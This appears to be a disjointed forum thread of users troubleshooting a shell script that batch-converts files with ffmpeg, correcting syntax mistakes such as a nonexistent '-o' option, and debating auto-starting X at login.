Running that did not function
if ! [ -d "$done" ]
syntax error
in script try to use "mkdir -p" instead "mkdir" it will create all the dir path if not trivial, and won't fail if dir already exist

paste me your command please
The variable $done is always empty.
What do you think "$done" is?
find . -maxdepth 1 -type f -exec ffmpeg -i {} -c:a copy -o converted_{} \;
This is for particular use, but i want to be able to do basic ffmepg commands, like changing containers etc just by making new scripts
 ffmpeg -i "$file" -vf subtitles="$file" -c:a copy "$file"

Having it as $DIRECTORY didnt make the folder
>Just type startx.

<code> [[ -z $DISPLAY && $XDG_VTNR -eq 1 ]] && exec startx </code>
"Unrecognized option 'o'.
Error splitting the argument list: Option not found"
>using bashisms for a simple sh task
Well, I just added your ffmpeg command. The find itself should work fine.
ffmpeg doesn't have an -o option.
ffmpeg -i infile.flac outfile.opus works.
Stop trying to copy from other scripts without understanding the most basics of basics.
Shit that starts with $ are variables.

Typing startx each tty login is time bloat
But it's fun
You don't get the point.
Use a search engine for the term "bashism".
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